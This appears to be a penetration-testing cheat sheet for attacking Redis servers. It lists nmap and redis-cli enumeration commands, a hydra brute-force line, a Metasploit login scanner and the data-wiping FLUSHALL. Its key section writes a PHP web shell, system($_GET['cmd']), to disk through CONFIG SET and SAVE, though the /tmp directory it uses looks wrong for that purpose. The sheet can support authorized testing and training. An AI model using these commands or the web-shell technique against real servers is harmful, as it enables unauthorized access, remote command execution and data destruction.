==============================
Redis (Remote Database / Cache)
Cheat Sheet – Professional
==============================

PORTS:
6379/TCP – Redis default
Optional: 6380, custom ports

Transport:
TCP

Purpose:
In-memory database / caching service

--------------------------------
1. BASIC ENUMERATION
--------------------------------

nmap -p6379 -sV <IP>
nmap -p6379 --script redis-info <IP>

redis-cli -h <IP> -p 6379
AUTH <password>

PING                # Check server
INFO                # Server info & config
CONFIG GET *        # Get config parameters
KEYS *              # List keys
GET <key>           # Read key
SET <key> <value>   # Write key
DEL <key>           # Delete key
FLUSHALL            # Remove all data (dangerous)

redis-cli -h <IP> INFO
redis-cli -h <IP> --raw KEYS '*'

# Export DB
SAVE
BGSAVE
CONFIG GET dir
CONFIG GET dbfilename

# If Redis runs as root (rare)
CONFIG SET dir /tmp
CONFIG SET dbfilename shell.php
SET test "<?php system($_GET['cmd']); ?>"
SAVE

hydra -s 6379 -v -V -u -L users.txt -P passwords.txt redis

# Config
/etc/redis/redis.conf

# Logs
/var/log/redis/redis-server.log


use auxiliary/scanner/redis/redis_login
